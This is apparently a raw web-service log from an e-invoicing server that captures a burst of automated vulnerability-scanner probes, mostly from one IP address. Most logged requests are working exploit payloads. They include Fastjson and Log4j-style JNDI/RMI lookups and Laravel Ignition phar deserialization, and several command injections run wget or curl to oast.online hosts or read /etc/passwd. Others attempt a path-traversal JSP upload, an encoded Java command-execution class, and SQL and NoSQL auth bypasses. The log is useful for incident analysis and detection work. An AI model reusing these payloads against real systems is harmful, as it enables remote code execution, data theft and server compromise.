xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"
xmlns:a="http://schemas.datacontract.org/2004/07/System">
mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
Compare
System.String
System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]
Start
System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
System.Diagnostics.Process
System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]
System.Diagnostics.Process Start(System.String, System.String)
System.Diagnostics.Process Start(System.String, System.String)
8
Int32 Compare(System.String, System.String)
System.Int32 Compare(System.String, System.String)
8
2
/c nslookup cb6o5meg2jqcit800010sb6kfzy59anm9.oast.online
cmd
2022-07-12 21:55:09.7800|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:55:52.1450|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"Lcom.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://cb6o5meg2jqcit800010dfhfgki5cett1.oast.online/Exploit",
"autoCommit":true
}
2022-07-12 21:56:06.2604|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
2022-07-12 21:56:22.3030|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:57:39.9188|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:58:11.4786|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:58:28.7736|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
2022-07-12 21:58:31.8189|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
2022-07-12 21:58:34.7038|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 oracle.toplink.internal.sessions.UnitOfWorkChangeSet-84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130973013951051101001011101167811710998101114730149511611497110115108101116731101001011209002195117115101831011141181059910111577101991049711010511510976025959799991011151156912011610111411097108831161211081011151041011011161160187610697118974710897110103478311611410511010359760119597117120671089711511510111511605976991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947114117110116105109101477297115104116979810810159910109598121116101991111001011151160391916691069599108971151151160189176106971189747108971101034767108971151155976059511097109101113012604760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-1011603971081081121171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112001429-54-2-70-66000500-70100303470-727037703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-904076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145941861081051161011149711611111410537699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459107104971101001081011141065769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910108311111711499101701051081011012719710010310111611546106971189712010011704010511211151111151011141059710847112971211081119710011547117116105108477197100103101116115368311611798841149711011510810111680971211081119710010649911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699471141171101161051091014765981151161149799116841149711011510810111610201069711897471051114783101114105971081051229798108101105799111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994784114971101151081011166912099101112116105111110103112111511111510111410597108471129712110811197100115471171161051084771971001031011161151086099108105110105116621016106971189747108971101034784104114101971007042101399117114114101110116841041141019710010204041761069711897471089711010347841041141019710059120440451004304610271191019810811110310599471191111141074769120101991171161018410411410197100704810141031011166711711411410111011687111114107102940417611910198108111103105994711911111410747871111141076510097112116101114591205005110049052104411910198108111103105994711510111411810810111647105110116101114110971084783101114118108101116821011131171011151167310911210870541039910910080561091031011167210197100101114103840761069711897471089711010347831161141051101035941761069711897471089711010347831161141051101035912058059100550601011103101116821011151121111101151011049404176119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011168210111511211111011510173109112108591206206310055064103716675806610451191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111682101115112111110115101731091121087068102011510111667104971149799116101114691109911110010511010310214076106971189747108971101034783116114105110103594186120700711006907210221031011168310111411810810111679117116112117116831161141019710910534041761191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111679117116112117116831161141019710973109112108591207407510069076103511910198108111103105994712010910847117116105108478311611410511010373110112117116831161141019710970781022106971189747108971101034783116114105110103661171021021011147080100810341069711211210111010010444076106971189747108971101034783116114105110103594176106971189747108971101034783116114105110103661171021021011145912083084100810851053258321310808710811611183116114105110103102040417610697118974710897110103478311611410511010359120890901008109112010071100790931049119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011167911711611211711683116114101971097310911210870951011119114105116101831161141019710910244076106971189747105111477311011211711683116114101971095941861209709810096099105102108117115104120101011100960102107111115461109710910180104101610697118974710897110103478312111511610110970106101110310111680114111112101114116121120108059100107010910161069711897471089711010347831161141051101037011110111161117611111910111467971151011201130901001120114103119105110801161089911111011697105110115102740761069711897471089711010347671049711483101113117101110991015941901201180119100112012010171069711897471089711010347821171101161051091017012210101031011168211711011610510910110214041761069711897471089711010347821171101161051091015912012401251001230126107991091003247993280-12810410112010199103940761069711897471089711010347831161141051101035941761069711897471089711010347801141119910111511559120-1260-1251001230-12410114798105110471151043245993280-12210221069711897471051114766117102102101114101100821019710010111470-120102510697118974710511147731101121171168311611410197109821019710010111470-11810171069711897471089711010347801141119910111511570-116101410310111673110112117116831161141019710910234041761069711897471051114773110112117116831161141019710959120-1140-113100-1150-11210424076106971189747105111477311011211711683116114101971095976106971189747108971101034783116114105110103594186120100-110100-1170-10910194076106971189747105111478210197100101114594186120100-107100-1190-10610080-1041081141019710076105110101120-102090100-1190-10110910310111687114105116101114102340417610697118974710511147801141051101168711410511610111459120-990-98100690-97101910697118974710511147801141051101168711410511610111470-95105119114105116101120-93071100-940-9210191069711897471089711010347691209910111211610511111070-901031111171161021761069711897471051114780114105110116831161141019710959120-880-87901070-861019106971189747108971101034784104114111119979810810170-84100-8309110191069711897471051114780114105110116831161141019710970-81107112114105110116108110120-79071100-800-781015112114105110116831169799107841149799101120-76011100-830-751013831169799107779711284979810810110291211151111151011141059710847801191101011145253525156514952505556575750103176121115111115101114105971084780119110101114525352515651495250555657575059033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100047014000120100050150-710001019020020120006300030001-79000201300060100052014000320300010150-710000010210220100010230240202500040102601019027020120007300040001-79000201300060100056014000420400010150-710000010210220100010280290200010300310302500040102608041011010120011140701100118-8903176-72047-64049-74053-640551857-7406177-72047-64049-74053-64055-7406578451867-7407345-74077584254-6907989-6908189-7308244-740861888-74086-74092-73094-740100254-74010318105-7201105852551-91016255-74011518117-740121-10206-89033-720127-6908189-7308218-127-7408644-74086-74092-740-123586-89030-720127-6908189-7308218-121-7408644-74086-74092-740-123586-690-11989-690-11789256-740-1111867-730-108-730-105587158818-103589-89025-6908189-73082259-74086258-74086-74092589257-740-100895881-90-1-3145-740-96259-740-91-890245810-780-852510-740-82-740-772510-740-74-8903-79010940-70-40-89010-7300070093-10109060570112706970967011200229-402670-115-203270-119701127011221-102306057011270697096701120170-8920020320002033017000100102035016091171130126013001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100060014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012609120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120
2022-07-12 21:58:34.7940|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
2022-07-12 21:58:36.1267|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 action=verify-haras
2022-07-12 21:58:37.8012|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExecidconnectionHandlertrue
2022-07-12 21:58:37.9045|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
2022-07-12 21:58:41.0250|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
2022-07-12 21:58:44.0672|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
2022-07-12 21:59:03.0399|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 IWP_JSON_PREFIX
2022-07-12 21:59:35.9844|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://cb6o5meg2jqcit800010kt5yh1zwuaarx.oast.online`;busybox wget http://cb6o5meg2jqcit800010xgu97jeejw78b.oast.online&ipv=0
2022-07-12 21:59:38.2385|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:59:38.5273|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://cb6o5meg2jqcit800010ocp66cfaixfz8.oast.online`;wget http://cb6o5meg2jqcit800010ymbzuq3p6ndtt.oast.online&ipv=0
2022-07-12 22:01:03.4320|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 blowfish=1&blowf=system('echo CVE-2022-1609 | rev');
2022-07-12 22:01:17.5354|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:02:12.7265|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat+%2Fetc%2Fpasswd')]=nuclei
2022-07-12 22:02:16.1207|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type+C%3A%2FWindows%2Fwin.ini')]=nuclei
2022-07-12 22:02:21.9005|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:02:25.4421|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:02:31.9809|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:02:41.8176|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"type": "bulk",
"source": "default",
"args":[
{
"type": "run_sql",
"args": {
"source":"default",
"sql":"SELECT pg_read_file('/etc/passwd',0,100000);",
"cascade": false,
"read_only": false
}
}
]
}
2022-07-12 22:03:02.7002|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"org.apache.xbean.propertyeditor.JndiConverter",
"AsText":"rmi://cb6o5meg2jqcit800010eroqjarftxj1c.oast.online/exploit"
}
2022-07-12 22:03:25.4317|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 --------------------------aadc326f7ae3eac3
Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/2BqZOckSeEfMECOftj4xbQn8FXu.jsp"
Content-Type: text/plain
<%
out.println("CVE-2022-26352");
%>
--------------------------aadc326f7ae3eac3--
2022-07-12 22:03:35.7958|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:06:29.7205|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:07:37.2501|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:07:39.2295|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:07:55.9058|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://cb6o5meg2jqcit800010sqt19snrmkhxh.oast.online")
2022-07-12 22:07:57.7067|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:08:44.0144|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:09:04.1331|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"auth": {
"user": {
"$eq": "admin"
},
"password": [
0
]
}
}
2022-07-12 22:09:19.4838|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:09:23.4485|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:09:25.8581|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/2BqZOcH6vbE1C5YcAqYlrEXCOOn.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
2022-07-12 22:09:30.1278|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"headers":{
"X-Real-IP":"127.0.0.1",
"Content-Type":"application/json"
},
"timeout":1500,
"pipeline":[
{
"method":"PUT",
"path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
"body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/2BqZOd8VDB3diOuUZCTdCfKzlCe\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://cb6o5meg2jqcit800010s33b6mf5h5pzj.oast.online/`whoami`'); return true end\"}"
}
]
}
2022-07-12 22:09:34.1216|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:09:42.5023|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:09:46.5312|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:09:50.6013|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ??��sr��java.util.ArrayListx??�??a?���I��sizexp����w�����t� element 1t� element 2x
2022-07-12 22:09:54.4609|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ??��sr��java.util.ArrayListx??�??a?���I��sizexp����w�����t� element 1t� element 2x
2022-07-12 22:11:45.5272|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:11:59.7398|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:12:45.3887|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:13:17.7201|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:13:31.0634|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
HTTP://113.161.87.66/wsman/
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript
102400
uuid:00B60932-CC01-0005-0000-000000010000
PT1M30S
root/scx
aWQ=
0
true
2022-07-12 22:14:31.8797|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:14:54.6928|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:15:38.9191|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:15:43.0002|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
2022-07-12 22:17:17.5803|INFO|EINVOICENET.WebService.ClsLog|54.36.148.147
2022-07-12 22:17:31.2184|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://cb6o5meg2jqcit800010ypm9e49hoyxmy.oast.online/Exploit",
"autoCommit":true
}
}
2022-07-12 22:17:35.7919|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:18:19.4125|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:18:23.3934|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:18:35.9465|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {\"url\":\"http://cb6o5meg2jqcit800010z7yfqc8e1bdek.oast.online\"}
2022-07-12 22:19:18.4620|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:20:47.0511|INFO|EINVOICENET.WebService.ClsLog|51.140.4.122
2022-07-12 22:20:48.8179|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:20:50.1656|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"name": "test"
}
2022-07-12 22:20:53.8576|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}
2022-07-12 22:21:19.3556|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 22:21:22.8632|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 [IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=4
host=$(echo 127.0.0.1; wget http://cb6o5meg2jqcit8000109bxurh6ma9rdy.oast.online)
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
2022-07-12 22:21:23.0246|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
------WebKitFormBoundaryIMv3mxRg59TkFSX5
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
AT&TFORM���?DJVMDIRM���.?�����F���????? !?N?���???k?D�,q�?I?n????"?FORM���^DJVUINFO���
